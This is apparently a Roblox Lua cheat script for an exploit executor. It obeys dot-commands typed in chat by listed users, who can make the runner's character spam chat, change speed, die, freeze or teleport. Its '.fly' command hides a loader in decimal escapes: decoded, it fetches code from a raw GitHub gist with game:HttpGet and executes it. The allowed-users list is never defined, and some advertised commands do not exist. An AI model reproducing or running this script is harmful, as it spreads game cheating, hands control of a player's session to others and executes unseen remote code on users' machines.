local chatEvents = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents")
local messageDoneFiltering = chatEvents:WaitForChild("OnMessageDoneFiltering")

messageDoneFiltering.OnClientEvent:Connect(function(message)
   local player = game.Players:FindFirstChild(message.FromSpeaker)
   local message = message.Message or ""

    if player and table.find(allowedusers, player.UserId) then
     if tostring(message) == ".test" then
          print("test 1 working")
            elseif string.find(tostring(message), '.msg') then
                local String = message:gsub('.msg ', '')
                game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(String, 'All')
            elseif string.find(tostring(message), '.speed') then
                local String = message:gsub('.speed ', '')
                game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = String
            elseif string.find(tostring(message), '.jumppower') then
                local String = message:gsub('.jumppower ', '')
                game.Players.LocalPlayer.Character.Humanoid.JumpPower = String
            elseif string.find(tostring(message), '.hipheight') then
                local String = message:gsub('.hipheight ', '')
                game.Players.LocalPlayer.Character.Humanoid.HipHeight = String
            elseif string.find(tostring(message), '.spam') then
                local String = message:gsub('.spam ', '')
                _G.spam = true
                while _G.spam == true do
                    game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(String, 'All')
                    wait(1)
                end
            elseif tostring(message) == ".stopsp" then
                _G.spam = false
            elseif tostring(message) == ".fly" then
                loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
            elseif tostring(message) == ".forcereset" then
                game.Players.LocalPlayer.Character.Humanoid.Health = 0
            elseif tostring(message) == ".freeze" then
                game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
            elseif tostring(message) == ".unfreeze" then
                game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
            elseif tostring(message) == ".rejoin" then
                local ts = game:GetService("TeleportService")
                local p = game:GetService("Players").LocalPlayer
                ts:Teleport(game.PlaceId, p)
            elseif tostring(message) == ".sit" then
                game.Players.LocalPlayer.Character.Humanoid.Sit = true
end
end
end)

local wasdPlayer = game:GetService("Players").LocalPlayer;
local bruhgotoPlayer;
game:GetService("Players").LocalPlayer.Chatted:Connect(function(Message)
   if Message:find(".goto") then
       local Chosen = string.gsub(Message, ".goto ", "");
       local x,m = pcall(function()
           bruhgotoPlayer = game:GetService("Players")[Chosen];
       end)
       if not x then
           warn(Chosen .. " not found!");
           return;
       end
       wasdPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(bruhgotoPlayer.Character.HumanoidRootPart.Position);
   end
end)

print("Commands:")
print("Prefix: .")
print(".goto [Plr]")
print(".msg [Msg]")
print(".fly")
print(".forcereset")
print(".spam [Msg]")
print(".stopsp (stops spam)")
print(".hipheight [Amount]")
print(".speed [Amount]")
print(".jumppower [Amount]")
print(".freeze")
print(".unfreeze")
print(".rejoin")
print(".own [Plr] -- its bang")
print(".unbang -- stops bang/own")
print(".sit")
